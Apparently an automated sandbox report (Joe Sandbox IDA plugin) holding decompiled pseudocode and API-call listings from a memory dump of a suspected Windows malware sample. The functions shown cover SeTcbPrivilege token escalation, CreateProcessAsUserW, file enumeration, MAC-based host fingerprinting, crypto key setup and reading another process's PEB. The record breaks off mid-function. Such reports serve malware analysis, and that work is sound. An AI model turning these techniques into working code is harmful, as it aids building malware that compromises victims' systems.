												if(_t271 != 0) {
													goto L25;
												}
											}
										}
									}
								}
							} else {
								goto L18;
							}
						}
					}
					_t128 = _v68;
					__eflags = _t128;
					if(_t128 != 0) {
						_t141 =  *0x3b8628; // 0x593938
						_t108 = _t141 + 0x204; // 0x75503e6f
						 *((intOrPtr*)( *_t108))(_v8, _t128); // executed
					}
					_t129 = _v8;
					__eflags = _t129;
					if(_t129 != 0) {
						_t239 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t239 + 0xf8))))(_t129);
					}
					_t130 = _v20;
					__eflags = _t130;
					if(_t130 != 0) {
						_t205 =  *0x3b8628; // 0x593938
						_t112 = _t205 + 0x1fc; // 0x75501a4e
						 *((intOrPtr*)( *_t112))(_t130);
					}
					__eflags = _t271;
					if(_t271 != 0) {
						E0039BB40(_t271);
					}
					_t131 = _v16;
					__eflags = _t131;
					if(_t131 != 0) {
						AdjustTokenPrivileges(_t131, 0,  &_v128, 0x10, 0, 0); // executed
						_t237 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t237 + 0xf8))))(_v16);
					}
					return _v40;
				} else {
					E00396CB0( &_v228, 0x97);
					_t263 =  *0x3b8628; // 0x593938
					_t275 = _t273 + 8;
					_t272 =  *((intOrPtr*)( *((intOrPtr*)(_t263 + 0x48))))( &_v228);
					if(_t272 == 0) {
						L3:
						return 0;
					} else {
						E00396CB0( &_v228, 0x98);
						 *0x3b85dc = GetProcAddress(_t272,  &_v228);
						E00396CB0( &_v228, 0x99);
						 *0x3b85f8 = GetProcAddress(_t272,  &_v228);
						E00396CB0( &_v228, 0x9a);
						 *0x3b85fc = GetProcAddress(_t272,  &_v228);
						E00396CB0( &_v228, 0x9b);
						_t273 = _t275 + 0x20;
						_t199 = GetProcAddress(_t272,  &_v228);
						 *0x3b85c8 = _t199;
						if(_t199 != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
			}












































































    0x0039c329
    0x0039c33a
    0x0039c33d
    0x0039c340
    0x0039c347
    0x0039c34a
    0x0039c34d
    0x0039c350
    0x0039c361
    0x0039c364
    0x0039c368
    0x0039c36b
    0x0039c36e
    0x0039c371
    0x0039c374
    0x0039c37a
    0x0039c44f
    0x0039c44f
    0x0039c458
    0x0039c463
    0x0039c463
    0x0039c46e
    0x0039c470
    0x0039c472
    0x0039c48a
    0x0039c48c
    0x0039c48e
    0x0039c4a8
    0x0039c4af
    0x0039c4bd
    0x0039c4bd
    0x0039c48e
    0x0039c4bf
    0x0039c4c4
    0x0039c4c7
    0x0039c4c9
    0x0039c515
    0x0039c515
    0x0039c51a
    0x0039c51c
    0x00000000
    0x0039c522
    0x0039c524
    0x0039c526
    0x0039c529
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0039c529
    0x0039c4cb
    0x0039c4d7
    0x0039c4d9
    0x0039c4db
    0x00000000
    0x0039c4dd
    0x0039c4dd
    0x0039c4e0
    0x0039c4e3
    0x0039c4e5
    0x0039c4e7
    0x0039c4e9
    0x0039c4f0
    0x0039c4f0
    0x0039c4f2
    0x0039c501
    0x0039c501
    0x0039c501
    0x0039c4f4
    0x0039c4f5
    0x0039c4f8
    0x0039c4fa
    0x00000000
    0x00000000
    0x0039c4fc
    0x00000000
    0x0039c4fa
    0x0039c4f0
    0x0039c504
    0x0039c504
    0x0039c509
    0x0039c50b
    0x0039c50e
    0x0039c50e
    0x0039c510
    0x0039c513
    0x0039c52f
    0x0039c52f
    0x0039c53b
    0x0039c542
    0x0039c548
    0x0039c54a
    0x0039c711
    0x0039c711
    0x0039c550
    0x0039c553
    0x0039c56d
    0x0039c56f
    0x0039c571
    0x00000000
    0x0039c577
    0x0039c57a
    0x0039c586
    0x0039c599
    0x0039c5a3
    0x0039c5a5
    0x0039c5a7
    0x0039c5a9
    0x0039c5d1
    0x0039c5ec
    0x0039c5ee
    0x0039c5f0
    0x0039c5fa
    0x0039c608
    0x0039c60d
    0x0039c614
    0x0039c61a
    0x0039c631
    0x0039c633
    0x0039c635
    0x0039c640
    0x0039c643
    0x0039c646
    0x0039c649
    0x0039c64c
    0x0039c64f
    0x0039c652
    0x0039c655
    0x0039c65e
    0x0039c661
    0x0039c66b
    0x0039c672
    0x0039c679
    0x0039c67b
    0x0039c67d
    0x0039c691
    0x0039c698
    0x0039c6a0
    0x0039c6aa
    0x0039c6b0
    0x0039c6b6
    0x0039c6c0
    0x0039c6c2
    0x0039c6c4
    0x0039c6f2
    0x0039c6f4
    0x0039c6f6
    0x0039c701
    0x0039c706
    0x0039c708
    0x0039c708
    0x0039c6f6
    0x0039c6c4
    0x0039c67d
    0x0039c635
    0x0039c5ab
    0x0039c5ab
    0x0039c5b1
    0x0039c5b4
    0x0039c5c4
    0x0039c5c6
    0x0039c5c9
    0x0039c5cb
    0x00000000
    0x00000000
    0x0039c5cb
    0x0039c5b4
    0x0039c5a9
    0x0039c571
    0x00000000
    0x00000000
    0x00000000
    0x0039c513
    0x0039c4db
    0x0039c714
    0x0039c717
    0x0039c719
    0x0039c71f
    0x0039c724
    0x0039c72b
    0x0039c72b
    0x0039c72d
    0x0039c730
    0x0039c732
    0x0039c734
    0x0039c741
    0x0039c741
    0x0039c743
    0x0039c746
    0x0039c748
    0x0039c74a
    0x0039c750
    0x0039c757
    0x0039c757
    0x0039c759
    0x0039c75b
    0x0039c75e
    0x0039c763
    0x0039c766
    0x0039c769
    0x0039c76b
    0x0039c783
    0x0039c788
    0x0039c795
    0x0039c795
    0x0039c7a0
    0x0039c380
    0x0039c38c
    0x0039c391
    0x0039c39a
    0x0039c3a6
    0x0039c3aa
    0x0039c448
    0x0039c44e
    0x0039c3b0
    0x0039c3bc
    0x0039c3d4
    0x0039c3e5
    0x0039c403
    0x0039c408
    0x0039c426
    0x0039c42b
    0x0039c430
    0x0039c43b
    0x0039c43d
    0x0039c444
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0039c444
    0x0039c3aa

    APIs
    • GetProcAddress.KERNEL32(00000000,?), ref: 0039C3D2
    • GetProcAddress.KERNEL32(00000000,?), ref: 0039C3F5
    • GetProcAddress.KERNEL32(00000000,?), ref: 0039C418
    • GetProcAddress.KERNEL32(00000000,?), ref: 0039C43B
    • LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 0039C48A
    • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,?,?), ref: 0039C4BD
    • GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,80000000), ref: 0039C5A5
    • GetLastError.KERNEL32 ref: 0039C5AB
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • GetTokenInformation.KERNELBASE(?,00000001,00000000,80000000,80000000), ref: 0039C5EC
    • CreateProcessAsUserW.KERNEL32(?,00000000,08000424,00000000,00000000,00000000,FFFFFFFF,08000424,00000000,00000044,?), ref: 0039C6F2
    • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 0039C783
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00392450, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 159
    C-Code - Quality: 75%
    			E00392450(intOrPtr _a4, signed int* _a8) {
				signed int _v8;
				void* _v12;
				short _v536;
				char _v736;
				struct _WIN32_FIND_DATAW _v1328;
				intOrPtr* _t49;
				signed int _t50;
				void* _t52;
				int _t55;
				intOrPtr _t57;
				signed int _t62;
				signed int _t65;
				signed int _t69;
				long _t70;
				signed int _t72;
				signed int _t73;
				signed int _t74;
				void* _t78;
				intOrPtr _t86;
				intOrPtr _t88;
				intOrPtr _t93;
				signed int _t96;
				signed int _t97;
				void* _t98;
				void* _t99;
				void* _t101;

				_t86 =  *0x3b8628; // 0x593938
				_t97 = 0;
				_push(0);
				_push( &_v536);
				_push(0x105);
				_push(_a4);
				_t96 = 0;
				_v8 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x10))))() == 0) {
					L22:
					E0039BB40(_t97);
					 *_a8 = 0;
					return 0;
				} else {
					_t88 =  *0x3b8628; // 0x593938
					 *((intOrPtr*)( *((intOrPtr*)(_t88 + 0x1d8))))( &_v536);
					_t78 = 0x105;
					_t49 =  &_v536;
					while( *_t49 != _t97) {
						_t49 = _t49 + 2;
						_t78 = _t78 - 1;
						if(_t78 != 0) {
							continue;
						} else {
							goto L22;
						}
						goto L24;
					}
					__eflags = _t78 - _t97;
					if(_t78 == _t97) {
						goto L22;
					} else {
						_t72 = 0x105 - _t78;
						_t50 = E003A1C50( &_v536, 0x105, L"*.*");
						__eflags = _t50;
						if(_t50 < 0) {
							goto L22;
						} else {
							_t52 = FindFirstFileW( &_v536,  &_v1328); // executed
							_v12 = _t52;
							__eflags = _t52 - 0xffffffff;
							if(_t52 == 0xffffffff) {
								goto L22;
							} else {
								__eflags = 0;
								 *((short*)(_t98 + _t72 * 2 - 0x214)) = 0;
								do {
									__eflags = _v1328.dwFileAttributes & 0x00000010;
									if((_v1328.dwFileAttributes & 0x00000010) != 0) {
										goto L16;
									} else {
										_t96 = _t96 + 1;
										_t73 = _t96 * 4;
										_t97 = E003A1D90(_t73, _t97);
										_t99 = _t99 + 8;
										__eflags = _t97;
										if(_t97 != 0) {
											_t62 = E003A1D90(0x208, 0);
											_t99 = _t99 + 8;
											 *(_t73 + _t97 - 4) = _t62;
											__eflags = _t62;
											if(__eflags != 0) {
												E00399090(__eflags,  &_v736, 0x73);
												_push( &(_v1328.cFileName));
												_t65 = E003A0C10( *(_t73 + _t97 - 4), 0x105,  &_v736,  &_v536);
												_t99 = _t99 + 0x1c;
												__eflags = _t65;
												if(_t65 < 0) {
													_t96 = _t96 - 1;
													_t74 = _t96 * 4;
													E0039BB40( *((intOrPtr*)(_t74 + _t97)));
													_t101 = _t99 + 4;
													_push(_t97);
													__eflags = _t96;
													if(_t96 == 0) {
														E0039BB40();
														_t99 = _t101 + 4;
														_t97 = 0;
														__eflags = 0;
													} else {
														_push(_t74);
														_t69 = E003A1D90();
														_t99 = _t101 + 8;
														_t97 = _t69;
													}
												}
												goto L16;
											}
										}
									}
									L19:
									_t57 =  *0x3b8628; // 0x593938
									 *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x34))))(_v12);
									__eflags = _v8;
									if(_v8 != 0) {
										 *_a8 = _t96;
										return _t97;
									} else {
										__eflags = _t96;
										while(_t96 != 0) {
											_t93 =  *((intOrPtr*)(_t97 + _t96 * 4 - 4));
											_t96 = _t96 - 1;
											E0039BB40(_t93);
											_t99 = _t99 + 4;
											__eflags = _t96;
										}
										goto L22;
									}
									goto L24;
									L16:
									_t55 = FindNextFileW(_v12,  &_v1328); // executed
									__eflags = _t55;
								} while (_t55 != 0);
								_t70 = GetLastError();
								__eflags = _t70 - 0x12;
								if(_t70 == 0x12) {
									_v8 = 1;
								}
								goto L19;
							}
						}
					}
				}
				L24:
			}





























    0x0039245c
    0x00392465
    0x00392467
    0x0039246e
    0x00392472
    0x00392477
    0x00392478
    0x0039247a
    0x00392481
    0x00392619
    0x0039261a
    0x0039262b
    0x00392631
    0x00392487
    0x00392487
    0x0039249a
    0x0039249c
    0x003924a1
    0x003924a7
    0x003924ac
    0x003924af
    0x003924b0
    0x00000000
    0x003924b2
    0x00000000
    0x003924b2
    0x00000000
    0x003924b0
    0x003924b7
    0x003924b9
    0x00000000
    0x003924bf
    0x003924c9
    0x003924d7
    0x003924dc
    0x003924de
    0x00000000
    0x003924e4
    0x003924fb
    0x003924fd
    0x00392500
    0x00392503
    0x00000000
    0x00392509
    0x00392509
    0x0039250b
    0x00392513
    0x00392513
    0x0039251a
    0x00000000
    0x00392520
    0x00392520
    0x00392521
    0x0039252f
    0x00392531
    0x00392534
    0x00392536
    0x00392543
    0x00392548
    0x0039254b
    0x0039254f
    0x00392551
    0x00392560
    0x0039256b
    0x00392584
    0x00392589
    0x0039258c
    0x0039258e
    0x00392590
    0x00392591
    0x0039259c
    0x003925a1
    0x003925a4
    0x003925a5
    0x003925a7
    0x003925b6
    0x003925bb
    0x003925be
    0x003925be
    0x003925a9
    0x003925a9
    0x003925aa
    0x003925af
    0x003925b2
    0x003925b2
    0x003925a7
    0x00000000
    0x0039258e
    0x00392551
    0x00392536
    0x003925ef
    0x003925f2
    0x003925fb
    0x003925fd
    0x00392601
    0x00392635
    0x0039263f
    0x00392603
    0x00392603
    0x00392605
    0x00392607
    0x0039260b
    0x0039260d
    0x00392612
    0x00392615
    0x00392615
    0x00000000
    0x00392605
    0x00000000
    0x003925c0
    0x003925d3
    0x003925d5
    0x003925d5
    0x003925dd
    0x003925e3
    0x003925e6
    0x003925e8
    0x003925e8
    0x00000000
    0x003925e6
    0x00392503
    0x003924de
    0x003924b9
    0x00000000

    APIs
    • FindFirstFileW.KERNELBASE(?,?,?,00000105,*.*), ref: 003924FB
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
      • Part of subcall function 003A0C10: _vsnwprintf.MSVCRT ref: 003A0C42
    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 003925D3
    • GetLastError.KERNEL32 ref: 003925DD
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A0C80, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115
    C-Code - Quality: 100%
    			E003A0C80(void* __ecx) {
				char _v8;
				char _v12;
				signed int _v16;
				void* _t37;
				void* _t39;
				intOrPtr _t41;
				intOrPtr _t47;
				void* _t50;
				intOrPtr _t59;
				void* _t65;
				signed int _t66;
				signed int _t67;
				void* _t68;
				void* _t69;
				void* _t71;

				_t65 = __ecx;
				_t1 = _t65 + 0x28; // 0xf003b85
				_t29 =  *_t1;
				_t67 = 0;
				_v12 = 0;
				_v8 = 0x288;
				_v16 = 0;
				if( *_t1 != 0) {
					E0039BB40(_t29);
					_t68 = _t68 + 4;
					 *((intOrPtr*)(__ecx + 0x28)) = 0;
				}
				_t50 = E003A1D90(_v8, _t67);
				_t69 = _t68 + 8;
				if(_t50 == _t67) {
					L12:
					_t66 = _t67;
					goto L13;
				} else {
					_t59 =  *0x3b8628; // 0x593938
					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x1f4))))(_t50,  &_v8); // executed
					if(_t37 != 0x6f) {
						L6:
						_t14 = _t50 + 8; // 0x8
						_t39 = E0039F720(_t14, 0x194,  &_v12,  &_v16, 0x800c); // executed
						if(_t39 != 0) {
							_t41 = E003A1D90(2 + _v16 * 4, _t67);
							_t71 = _t69 + 8;
							 *((intOrPtr*)(_t65 + 0x28)) = _t41;
							if(_t41 == _t67) {
								goto L7;
							} else {
								do {
									_t22 = _t65 + 0x28; // 0xf003b85
									E003A0C10( *_t22 + _t67 * 4, 0x100, L"%02X",  *(_t67 + _v12) & 0x000000ff);
									_t67 = _t67 + 1;
									_t71 = _t71 + 0x10;
								} while (_t67 < 0x20);
								_t25 = _t65 + 0x28; // 0xf003b85
								 *((short*)( *_t25 + 0x80)) = 0;
								_t66 = 1;
								_t67 = 0;
								L13:
								_t32 = _v12;
								if(_v12 != _t67) {
									E0039BB40(_t32);
									_t69 = _t69 + 4;
								}
								if(_t50 != _t67) {
									E0039BB40(_t50);
								}
								return _t66;
							}
						} else {
							L7:
							return 0;
						}
					} else {
						_t50 = E003A1D90(_v8, _t50);
						_t69 = _t69 + 8;
						if(_t50 == _t67) {
							goto L12;
						} else {
							_t47 =  *0x3b8628; // 0x593938
							 *((intOrPtr*)( *((intOrPtr*)(_t47 + 0x1f4))))(_t50,  &_v8);
							goto L6;
						}
					}
				}
			}


















    0x003a0c89
    0x003a0c8b
    0x003a0c8b
    0x003a0c8e
    0x003a0c90
    0x003a0c93
    0x003a0c9a
    0x003a0c9f
    0x003a0ca2
    0x003a0ca7
    0x003a0caa
    0x003a0caa
    0x003a0cb7
    0x003a0cb9
    0x003a0cbe
    0x003a0d8a
    0x003a0d8a
    0x00000000
    0x003a0cc4
    0x003a0cc4
    0x003a0cd5
    0x003a0cda
    0x003a0d05
    0x003a0d17
    0x003a0d21
    0x003a0d28
    0x003a0d3f
    0x003a0d44
    0x003a0d47
    0x003a0d4c
    0x00000000
    0x003a0d50
    0x003a0d50
    0x003a0d57
    0x003a0d69
    0x003a0d6e
    0x003a0d6f
    0x003a0d72
    0x003a0d77
    0x003a0d7c
    0x003a0d83
    0x003a0d86
    0x003a0d8c
    0x003a0d8c
    0x003a0d91
    0x003a0d94
    0x003a0d99
    0x003a0d99
    0x003a0d9e
    0x003a0da1
    0x003a0da6
    0x003a0db1
    0x003a0db1
    0x003a0d2c
    0x003a0d2c
    0x003a0d32
    0x003a0d32
    0x003a0cdc
    0x003a0ce6
    0x003a0ce8
    0x003a0ced
    0x00000000
    0x003a0cf3
    0x003a0cf3
    0x003a0d03
    0x00000000
    0x003a0d03
    0x003a0ced
    0x003a0cda

    APIs
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • GetAdaptersInfo.IPHLPAPI(00000000,00000288,003A03C4,003A03C4,?,003B0F27,?), ref: 003A0CD5
      • Part of subcall function 003A0C10: _vsnwprintf.MSVCRT ref: 003A0C42
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003976E0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 128
    C-Code - Quality: 60%
    			E003976E0(void* _a4, int _a8, void* _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v8;
				char _v12;
				int _v16;
				int _v20;
				char _v24;
				void _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v68;
				void* _t41;
				char _t42;
				intOrPtr _t43;
				intOrPtr _t46;
				void* _t50;
				intOrPtr _t55;
				void* _t57;
				void* _t63;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t71;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t94;

				_t64 =  *0x3b8628; // 0x593938
				_t63 = 0;
				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				_v20 = 0;
				_t41 =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x180))))( &_v12, 0, 0, 0x18, 0xf0000000); // executed
				if(_t41 == 0) {
					L9:
					_t42 = _v8;
					if(_t42 != 0) {
						_t67 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x15c))))(_t42);
					}
					_t43 = _v12;
					if(_t43 != 0) {
						_t46 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t46 + 0x178))))(_t43, 0);
					}
					 *_a20 = _t63;
					 *_a24 = _v16;
					return _v20;
				}
				_v68 = 0x208;
				_v64 = 0x6610;
				_v60 = 0x20;
				_t12 = _t63 + 8; // 0x8
				_t50 = memcpy( &_v56, _a12, _t12 << 2);
				_push( &_v8);
				_t71 =  *0x3b8628; // 0x593938
				_push(1);
				_push(0);
				_push(0x2c);
				_push( &_v68);
				_push(_t50);
				if( *((intOrPtr*)( *((intOrPtr*)(_t71 + 0x170))))() != 0) {
					_t81 =  *0x3b8628; // 0x593938
					_push(0);
					_push( &_v24);
					_push(4);
					_v24 = 1;
					_push(_v8);
					if( *((intOrPtr*)( *((intOrPtr*)(_t81 + 0x17c))))() != 0) {
						_t55 =  *0x3b8628; // 0x593938
						_push(0);
						_push(_a16);
						_push(1);
						_push(_v8);
						if( *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x17c))))() != 0) {
							_t94 = _a8;
							_t57 = E003A1D90(_t94, 0); // executed
							_t63 = _t57;
							if(_t63 != 0) {
								memcpy(_t63, _a4, _t94);
								_t84 =  *0x3b8628; // 0x593938
								_push( &_v16);
								_push(_t63);
								_push(0);
								_push(1);
								_push(0);
								_v16 = _t94;
								_push(_v8);
								if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x168))))() == 0) {
									E0039BB40(_t63);
									_t63 = 0;
								} else {
									_v20 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}


























    0x003976e6
    0x003976f2
    0x003976fb
    0x003976fe
    0x00397701
    0x0039770b
    0x0039770e
    0x00397712
    0x003977f6
    0x003977f6
    0x003977fb
    0x003977fd
    0x0039780a
    0x0039780a
    0x0039780c
    0x00397811
    0x00397816
    0x00397821
    0x00397821
    0x0039782c
    0x0039782e
    0x00397837
    0x00397837
    0x00397720
    0x00397727
    0x0039772e
    0x00397735
    0x0039773b
    0x00397740
    0x00397741
    0x0039774c
    0x0039774d
    0x0039774e
    0x00397753
    0x0039775a
    0x0039775f
    0x00397768
    0x0039776e
    0x00397772
    0x00397773
    0x00397775
    0x0039777e
    0x00397783
    0x0039778b
    0x00397790
    0x00397791
    0x00397798
    0x00397799
    0x0039779e
    0x003977a0
    0x003977a5
    0x003977aa
    0x003977b1
    0x003977b9
    0x003977c1
    0x003977cd
    0x003977ce
    0x003977cf
    0x003977d1
    0x003977d2
    0x003977d4
    0x003977dd
    0x003977e2
    0x003977ea
    0x003977f2
    0x003977e4
    0x003977e4
    0x003977e4
    0x003977e2
    0x003977b1
    0x0039779e
    0x00397783
    0x00000000

    APIs
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • memcpy.MSVCRT ref: 003977B9
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00396740, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66native
    C-Code - Quality: 100%
    			E00396740(void* __ecx, void* _a4) {
				intOrPtr _v12;
				char _v20;
				intOrPtr _v40;
				void _v44;
				intOrPtr _v48;
				char _v108;
				intOrPtr _v316;
				char _v356;
				long _t14;
				void* _t17;
				void* _t19;
				void* _t22;
				void* _t36;

				_t35 = _a4;
				_t36 = __ecx;
				_t14 = NtQueryInformationProcess(_a4, 0,  &_v44, 0x18, 0); // executed
				if(_t14 < 0) {
					L5:
					return 0;
				} else {
					_t17 = E00396CD0(_t36, _t35, _v40,  &_v20, 0x10); // executed
					if(_t17 == 0) {
						goto L5;
					} else {
						_t19 = E00396CD0(_t36, _t35, _v12,  &_v108, 0x40); // executed
						if(_t19 == 0) {
							goto L5;
						} else {
							_t22 = E00396CD0(_t36, _t35, _v48 + _v12,  &_v356, 0xf8); // executed
							if(_t22 == 0) {
								goto L5;
							} else {
								return _v316 + _v12;
							}
						}
					}
				}
			}
















    0x0039674c
    0x00396758
    0x00396768
    0x0039676c
    0x003967cd
    0x003967d3
    0x0039676e
    0x0039677b
    0x00396782
    0x00000000
    0x00396784
    0x00396791
    0x00396798
    0x00000000
    0x0039679a
    0x003967b0
    0x003967b7
    0x00000000
    0x003967b9
    0x003967c8
    0x003967c8
    0x003967b7
    0x00396798
    0x00396782

    APIs
    • NtQueryInformationProcess.NTDLL(00003000,00000000,0039C9A1,00000018,00000000,0039C9A1,0039FE81,00000000), ref: 00396768
      • Part of subcall function 00396CD0: ReadProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0039CCD4,?,?,?,00000070,00000000), ref: 00396CF9
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039952C, Relevance: 1.5, APIs: 1, Instructions: 4
    C-Code - Quality: 100%
    			E0039952C() {

				SetUnhandledExceptionFilter(E0039BB6D); // executed
				return 0;
			}



    0x00399531
    0x00399539

    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_0000BB6D), ref: 00399531
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039F720, Relevance: 1.4, Strings: 1, Instructions: 115
    C-Code - Quality: 54%
    			E0039F720(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr _a20) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t42;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
